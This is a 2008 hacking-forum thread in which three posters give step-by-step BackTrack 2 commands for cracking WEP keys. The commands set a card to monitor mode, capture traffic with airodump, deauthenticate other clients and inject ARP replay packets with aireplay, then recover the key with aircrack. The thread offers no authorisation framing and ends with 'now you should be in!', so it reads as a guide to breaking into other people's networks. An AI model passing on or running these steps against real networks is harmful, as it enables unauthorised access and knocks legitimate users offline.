Follow us on Twitter!
Never in the field of human conflict was so much owed by so many to so few. - Winston Churchill
Thursday, April 17, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 16
Guests Online: 16
Members Online: 0

Registered Members: 82815
Newest Member: medjiking
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

BackTrack 2 wep key cracking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-03-08 19:35
I have got back track 2 and I was confused on eather the syntax of the commands them self or if i just diddent configure everything correctly. So to help others Here is what i have, I run iwconfig and set the wireless card to listen (iwconfig wlan0 mode moniter)
next i need to run kismet (when i run kismet it telles me i need to configure it! and to refer to the .doc **i did not know how/ or where it was**
but thats ok ther is an alternitave, airodump. so i get it all setup (airodump wlan0 dump channel 1)


-new window-
now i need to inject the packets so i can increase the IV's rapidly.
so i (aireplay -0 10 -1 "mac adress of AP" -c "client mac adress" wlan0) {this was to kick the other user off of the ap and re authenticate}

-new window-
now to the injection (aireplay -3 -b "mac adress of AP" -h "client mac adress" -x 500 wlan0)

now the numbers should increase
after a while 500,000 iv's or so later
time to crack them

-new window-
(aircrack -a 1 -b "mac adress of ap" dump.ivs)
this tells air crack that it should be trying to break the key
here is another method to use that is sometimes faster
(aircrack -a 1 -i 1 -n 64 -m "mac aderss of client" -b "mac adress of ap" dump.ivs)

and now you should get a wep key jot it down on a peice of paper reboot to windows and enter the key twice with out the :
and now you should be in!



(if anyone sees anything i need to add or if there is an error please let me know or, edit it thx Exidous)
PS: I need a sig

Edited by on 03-03-08 19:56
Author

RE: BackTrack 2 wep key cracking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-06-08 00:33
for you to use kismet on backtrack you have to edit kismet's conf
sudo kedit /usr/local/etc/kismet.conf

find the line, source=none,none,none
which is source=drivername,devicename,namegiven
for example mine is because i use the patched ipwraw drivers:
source=ipw3945,wifi0,Intel

others for example are:
source=ipw3945,eth1,intel
source=orinoco,eth1,kismet
etc.

then kismet will run, and run happy. Lucky you having a card and drivers that inject and enter monitor mode nicely. Few are so fortunate.


Author

RE: BackTrack 2 wep key cracking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-06-08 01:07
hmm..

I've never had to get 500K IV's to crack a wep, usually just 50K; I usually go about it kinda like this:

Code
Airmon-ng start rausb0





airodump-ng rasub0


i find the target AP, and a client that is on, then i use client's mac address in an arp attack

then i restart airodump to capture the packets i want

Code
airodump-ng --channel 6 -w  dumpfile rausb0




then i start the arp attack

aireplay-ng -3 -b <AP MAC> -h <AP Client's MAC> rausb0


i wait to 50K iv's then i crack it in less than a few seconds..